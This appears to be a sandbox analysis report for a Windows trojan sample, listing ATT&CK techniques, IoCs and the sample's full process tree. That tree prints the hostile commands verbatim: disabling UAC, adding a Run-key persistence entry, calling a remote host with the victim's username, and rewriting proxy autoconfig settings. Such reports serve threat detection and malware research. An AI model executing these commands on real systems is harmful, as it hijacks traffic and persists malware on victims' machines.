eb052448c64afaf6802f6a20f8f01f613c6d292caaa506d89c885255fee277bc

Analysis

max time kernel
117s
max time network
131s
platform
windows7_x64
resource
win7-20240708-en
resource tags

arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system
submitted
25/07/2024, 15:13

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

701e8508940b27e0b6f25ad054299679_JaffaCakes118.exe
Size

23KB
MD5

701e8508940b27e0b6f25ad054299679
SHA1

e0a02e3fb6a107b265dc8555224feb5dbc66df54
SHA256

eb052448c64afaf6802f6a20f8f01f613c6d292caaa506d89c885255fee277bc
SHA512

1704857f4c5f656ddc969040b88d0562fba348ef1af4a1b30991a3e2ec77307e3d640e3d2ea9e46d4719037815d6484d5939a74eb2f86243a8ab545e4a29fabc
SSDEEP

384:zSdr9sOcIp6wRcsSYLvKWLWbstQTid6HJyraXkqdkJ7PNWo7/tiX1HaNJawcudo2:zSFmOhplcsHvKWzX6HJmFqda7kortjng

Score

10^/10

discovery evasion persistence spyware stealer trojan upx

Malware Config

Signatures

UAC bypass 3 TTPs 1 IoCs

evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/memory/3064-0-0x0000000000400000-0x0000000000414000-memory.dmp	upx
behavioral1/memory/3064-168-0x0000000000400000-0x0000000000414000-memory.dmp	upx

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\ActiveX Update = "C:\\Users\\Admin\\AppData\\Local\\Temp\\AxUpdateMS.exe"	reg.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 60 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	find.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PING.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	IEXPLORE.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	find.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	find.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	701e8508940b27e0b6f25ad054299679_JaffaCakes118.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	find.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PING.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	find.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 3 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
2632	PING.EXE
2740	PING.EXE
2624	cmd.exe

Modifies Internet Explorer settings 1 TTPs 34 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c00000000000000010000000083ffff0083ffffffffffffffffffff2400000024000000aa04000089020000	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000a3d5a058b71c4645a1a6b8b9d2c7fb470000000002000000000010660000000100002000000064c09d5fb3165694246ea6f7d695a20e18557a093b71db3b6be9d616cf217890000000000e80000000020000200000003e4ee06c40590276383d9316b9d9a2e65f3883f17a3e4a49a77454f05666202c20000000dcbda40f6b0b44731d7cd1a9cbaad44583f8fa3c2d82b0a6e6737389890f0c33400000008f31f25ccd98318b20a20fc091664a3b77cdb395a243e49c4fae5a51c31393a8abefbb65cee6d11103d8d1878f015d436ea3fde879ec9a64298300a4ccdc667a	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\GPU	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\LowRegistry	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\DomainSuggestion	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "428082593"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Toolbar	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\SearchScopes	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000a3d5a058b71c4645a1a6b8b9d2c7fb47000000000200000000001066000000010000200000007e2ac9f728a0f303ef7d53fc24ce3317391a2e11db330f97c4aa6a585b883a24000000000e8000000002000020000000c4bd93940da190a03da66fed8c6fc736695ef4357d4cee2a4060a0356cb1d17890000000fa4180dd5562e8a8ca963df8749926b63d1ba379ff6de6be0be8095d6b955737999cd102a90a3183035adae1aeb521ba1ee6efd84df9f808c0d23c657e68c8870e21cc306b40126ed2decac2bbd9d5ca85db66c09046ea278d71c2cd9680fdbadc359939bb0be0a8152faeb613320006356a5e65990152d7a61279f3ba9cdf017628850d8d9959c95ee7aee35848df1b400000009eba92f347831c083d6c67ed26204d930281c344b54389e392900cb3a08643b03217bd39cfa2e131b189d4671ab748ed856aa2ecb87e32272ee39da2cdc0ee6f	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\IETld\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\PageSetup	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "2"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Zoom	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{2F843561-4A99-11EF-AB2E-FEF21B3B37D6} = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = f03f4506a6deda01	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\IntelliForms	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\InternetRegistry	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	iexplore.exe

Runs ping.exe 1 TTPs 2 IoCs

Remote System Discovery

T1018

pid	Process
2740	PING.EXE
2632	PING.EXE

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
2972	iexplore.exe

Suspicious use of SetWindowsHookEx 4 IoCs

pid	Process
2972	iexplore.exe
2972	iexplore.exe
2916	IEXPLORE.EXE
2916	IEXPLORE.EXE

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3064 wrote to memory of 2484	3064	701e8508940b27e0b6f25ad054299679_JaffaCakes118.exe	30
PID 3064 wrote to memory of 2484	3064	701e8508940b27e0b6f25ad054299679_JaffaCakes118.exe	30
PID 3064 wrote to memory of 2484	3064	701e8508940b27e0b6f25ad054299679_JaffaCakes118.exe	30
PID 3064 wrote to memory of 2484	3064	701e8508940b27e0b6f25ad054299679_JaffaCakes118.exe	30
PID 2484 wrote to memory of 2300	2484	cmd.exe	32
PID 2484 wrote to memory of 2300	2484	cmd.exe	32
PID 2484 wrote to memory of 2300	2484	cmd.exe	32
PID 2484 wrote to memory of 2300	2484	cmd.exe	32
PID 2484 wrote to memory of 2284	2484	cmd.exe	33
PID 2484 wrote to memory of 2284	2484	cmd.exe	33
PID 2484 wrote to memory of 2284	2484	cmd.exe	33
PID 2484 wrote to memory of 2284	2484	cmd.exe	33
PID 2484 wrote to memory of 2972	2484	cmd.exe	34
PID 2484 wrote to memory of 2972	2484	cmd.exe	34
PID 2484 wrote to memory of 2972	2484	cmd.exe	34
PID 2484 wrote to memory of 2972	2484	cmd.exe	34
PID 2484 wrote to memory of 2740	2484	cmd.exe	35
PID 2484 wrote to memory of 2740	2484	cmd.exe	35
PID 2484 wrote to memory of 2740	2484	cmd.exe	35
PID 2484 wrote to memory of 2740	2484	cmd.exe	35
PID 2484 wrote to memory of 2676	2484	cmd.exe	36
PID 2484 wrote to memory of 2676	2484	cmd.exe	36
PID 2484 wrote to memory of 2676	2484	cmd.exe	36
PID 2484 wrote to memory of 2676	2484	cmd.exe	36
PID 2972 wrote to memory of 2916	2972	iexplore.exe	37
PID 2972 wrote to memory of 2916	2972	iexplore.exe	37
PID 2972 wrote to memory of 2916	2972	iexplore.exe	37
PID 2972 wrote to memory of 2916	2972	iexplore.exe	37
PID 2484 wrote to memory of 2624	2484	cmd.exe	38
PID 2484 wrote to memory of 2624	2484	cmd.exe	38
PID 2484 wrote to memory of 2624	2484	cmd.exe	38
PID 2484 wrote to memory of 2624	2484	cmd.exe	38
PID 2624 wrote to memory of 2632	2624	cmd.exe	39
PID 2624 wrote to memory of 2632	2624	cmd.exe	39
PID 2624 wrote to memory of 2632	2624	cmd.exe	39
PID 2624 wrote to memory of 2632	2624	cmd.exe	39
PID 2624 wrote to memory of 2680	2624	cmd.exe	40
PID 2624 wrote to memory of 2680	2624	cmd.exe	40
PID 2624 wrote to memory of 2680	2624	cmd.exe	40
PID 2624 wrote to memory of 2680	2624	cmd.exe	40
PID 2484 wrote to memory of 2736	2484	cmd.exe	41
PID 2484 wrote to memory of 2736	2484	cmd.exe	41
PID 2484 wrote to memory of 2736	2484	cmd.exe	41
PID 2484 wrote to memory of 2736	2484	cmd.exe	41
PID 2484 wrote to memory of 1808	2484	cmd.exe	42
PID 2484 wrote to memory of 1808	2484	cmd.exe	42
PID 2484 wrote to memory of 1808	2484	cmd.exe	42
PID 2484 wrote to memory of 1808	2484	cmd.exe	42
PID 2484 wrote to memory of 268	2484	cmd.exe	43
PID 2484 wrote to memory of 268	2484	cmd.exe	43
PID 2484 wrote to memory of 268	2484	cmd.exe	43
PID 2484 wrote to memory of 268	2484	cmd.exe	43
PID 2484 wrote to memory of 308	2484	cmd.exe	44
PID 2484 wrote to memory of 308	2484	cmd.exe	44
PID 2484 wrote to memory of 308	2484	cmd.exe	44
PID 2484 wrote to memory of 308	2484	cmd.exe	44
PID 2484 wrote to memory of 1232	2484	cmd.exe	45
PID 2484 wrote to memory of 1232	2484	cmd.exe	45
PID 2484 wrote to memory of 1232	2484	cmd.exe	45
PID 2484 wrote to memory of 1232	2484	cmd.exe	45
PID 2484 wrote to memory of 948	2484	cmd.exe	46
PID 2484 wrote to memory of 948	2484	cmd.exe	46
PID 2484 wrote to memory of 948	2484	cmd.exe	46
PID 2484 wrote to memory of 948	2484	cmd.exe	46

Views/modifies file attributes 1 TTPs 3 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
1484	attrib.exe
856	attrib.exe
764	attrib.exe

C:\Users\Admin\AppData\Local\Temp\701e8508940b27e0b6f25ad054299679_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\701e8508940b27e0b6f25ad054299679_JaffaCakes118.exe"
1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3064
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\A16D.tmp\Untitled.bat" "
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2484
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2300
- - C:\Windows\SysWOW64\reg.exe
    C:\Windows\system32\reg.exe add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "ActiveX Update" /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\AxUpdateMS.exe"
    3⤵
    - Adds Run key to start application
    - System Location Discovery: System Language Discovery
    PID:2284
- - C:\Program Files\Internet Explorer\iexplore.exe
    "C:\Program Files\Internet Explorer\iexplore.exe" "juju.firepackets.org/ads.php?a=Admin&b=NNYJZAHP"
    3⤵
    - Modifies Internet Explorer settings
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    PID:2972
  - - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2972 CREDAT:275457 /prefetch:2
      4⤵
      System Location Discovery: System Language Discovery
      Modifies Internet Explorer settings
      Suspicious use of SetWindowsHookEx
      PID:2916
- - C:\Windows\SysWOW64\PING.EXE
    C:\Windows\system32\ping.exe www.google.com.br -n 1 -l 1
    3⤵
    - System Location Discovery: System Language Discovery
    - System Network Configuration Discovery: Internet Connection Discovery
    - Runs ping.exe
    PID:2740
- - C:\Windows\SysWOW64\find.exe
    find "TTL"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2676
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c C:\Windows\system32\ping.exe ju.firepackets.org -l 1 -n 1 | C:\Windows\system32\find.exe "TTL"
    3⤵
    - System Location Discovery: System Language Discovery
    - System Network Configuration Discovery: Internet Connection Discovery
    - Suspicious use of WriteProcessMemory
    PID:2624
  - - C:\Windows\SysWOW64\PING.EXE
      C:\Windows\system32\ping.exe ju.firepackets.org -l 1 -n 1
      4⤵
      System Location Discovery: System Language Discovery
      System Network Configuration Discovery: Internet Connection Discovery
      Runs ping.exe
      PID:2632
  - - C:\Windows\SysWOW64\find.exe
      C:\Windows\system32\find.exe "TTL"
      4⤵
      System Location Discovery: System Language Discovery
      PID:2680
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2736
- - C:\Windows\SysWOW64\reg.exe
    C:\Windows\system32\reg.exe add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v "AutoConfigUrl" /d "file://C:\Users\Admin\AppData\Local\Temp/KB_NNYJZAHP.txt" /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1808
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:268
- - C:\Windows\SysWOW64\reg.exe
    C:\Windows\system32\reg.exe add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v "EnableHttp1_1" /t reg_dword /d 00000001 /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:308
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1232
- - C:\Windows\SysWOW64\reg.exe
    C:\Windows\system32\reg.exe add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v "ProxyEnable" /t reg_dword /d 00000000 /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:948
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2216
- - C:\Windows\SysWOW64\reg.exe
    C:\Windows\system32\reg.exe add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v "ProxyHttp1.1" /t reg_dword /d 00000000 /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2304
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:296
- - C:\Windows\SysWOW64\reg.exe
    C:\Windows\system32\reg.exe add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Internet Explorer\Control Panel" /v "AdvancedTab" /t reg_dword /d 00000001 /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2408
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2060
- - C:\Windows\SysWOW64\reg.exe
    C:\Windows\system32\reg.exe add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Internet Explorer\Control Panel" /v "ResetWebSettings" /t reg_dword /d 00000001 /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1924
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:440
- - C:\Windows\SysWOW64\reg.exe
    C:\Windows\system32\reg.exe add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Internet Explorer\Control Panel" /v "Autoconfig" /t reg_dword /d 00000001 /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2536
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1624
- - C:\Windows\SysWOW64\reg.exe
    C:\Windows\system32\reg.exe add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v "AutoConfigUrl" /d "file://C:\Users\Admin\AppData\Local\Temp/KB_NNYJZAHP.txt" /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1900
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1548
- - C:\Windows\SysWOW64\reg.exe
    C:\Windows\system32\reg.exe add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v "EnableHttp1_1" /t reg_dword /d 00000001 /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1684
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1732
- - C:\Windows\SysWOW64\reg.exe
    C:\Windows\system32\reg.exe add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v "ProxyEnable" /t reg_dword /d 00000000 /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:692
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:944
- - C:\Windows\SysWOW64\reg.exe
    C:\Windows\system32\reg.exe add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v "ProxyHttp1.1" /t reg_dword /d 00000000 /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1328
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2512
- - C:\Windows\SysWOW64\reg.exe
    C:\Windows\system32\reg.exe add "HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Internet Explorer\Control Panel" /v "Autoconfig" /t reg_dword /d 00000001 /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:940
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:664
- - C:\Windows\SysWOW64\reg.exe
    C:\Windows\system32\reg.exe add "HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Internet Explorer\Control Panel" /v "AdvancedTab" /t reg_dword /d 00000001 /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1972
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1056
- - C:\Windows\SysWOW64\reg.exe
    C:\Windows\system32\reg.exe add "HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Internet Explorer\Control Panel" /v "ResetWebSettings" /t reg_dword /d 00000001 /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3000
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1772
- - C:\Windows\SysWOW64\reg.exe
